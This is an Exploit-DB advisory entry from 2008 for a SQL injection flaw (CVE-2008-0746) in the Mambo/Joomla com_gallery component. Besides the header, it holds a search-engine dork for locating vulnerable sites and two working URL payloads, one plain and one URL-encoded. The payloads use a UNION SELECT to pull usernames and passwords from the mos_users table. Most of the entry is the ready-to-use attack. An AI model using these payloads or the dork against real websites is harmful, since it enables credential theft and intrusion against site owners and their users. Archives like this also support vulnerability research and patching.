Mambo Component com_gallery Remote SQL Injection Vulnerability

2008-02-08T00:00:00
ID EDB-ID:5084
Type exploitdb
Reporter S@BUN
Modified 2008-02-08T00:00:00

Description

Mambo Component com_gallery Remote SQL Injection Vulnerability. CVE-2008-0746. Webapps exploit for php platform

                                        
                                            #########################################################################
#
# joomla SQL Injection(com_gallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORK 1 : allinurl: com_gallery "func"
#
##########################################################################
EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


EXPLOÄ°T 2 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users

##########################################################################
# S@BUN                     www.hackturkiye.com                  S@BUN
##########################################################################
# S@BUN                        i AM NOT HACKER                     S@BUN
##########################################################################

# milw0rm.com [2008-02-08]